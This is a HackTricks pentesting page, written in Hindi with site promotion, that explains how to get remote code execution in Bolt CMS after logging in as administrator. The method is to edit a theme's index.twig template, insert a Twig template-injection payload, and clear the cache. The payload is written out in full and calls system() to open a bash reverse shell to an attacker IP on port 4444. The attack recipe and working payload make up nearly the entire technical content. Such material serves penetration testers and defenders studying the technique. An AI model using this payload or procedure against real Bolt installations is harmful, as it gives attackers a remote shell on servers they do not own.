Bolt CMS

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

HackTricks का समर्थन करने के अन्य तरीके:

यदि आप अपनी कंपनी का विज्ञापन HackTricks में देखना चाहते हैं या HackTricks को PDF में डाउनलोड करना चाहते हैं तो सब्सक्रिप्शन प्लान्स देखें!
आधिकारिक PEASS और HackTricks स्वैग प्राप्त करें
The PEASS Family की खोज करें, हमारा विशेष NFTs संग्रह
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर पर फॉलो करें 🐦 @carlospolopm.
अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github repos में

RCE

व्यवस्थापक के रूप में लॉगिन करने के बाद (/bot पर जाने लॉगिन प्रॉम्प्ट तक पहुंचने के लिए), आप बोल्ट सीएमएस में RCE प्राप्त कर सकते हैं:

Configuration -> View Configuration -> Main Configuration का चयन करें या URL पथ /bolt/file-edit/config?file=/bolt/config.yaml पर जाएं
थीम का मान जांचें

File management -> View & edit templates का चयन करें
पिछले (इस मामले में base-2021) स्टेप में पाए गए थीम बेस का चयन करें और index.twig का चयन करें
मेरे मामले में यह URL पथ /bolt/file-edit/themes?file=/base-2021/index.twig में है
इस फ़ाइल में अपना पेलोड सेट करें टेम्पलेट इंजेक्शन (Twig) के माध्यम से, जैसे: {{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
और परिवर्तन सहेजें

Maintenance -> Clear the cache में कैश को साफ करें
फिर से एक सामान्य उपयोगकर्ता के रूप में पृष्ठ तक पहुंचें, और पेलोड का निष्पादन होना चाहिए

Last updated 2 months ago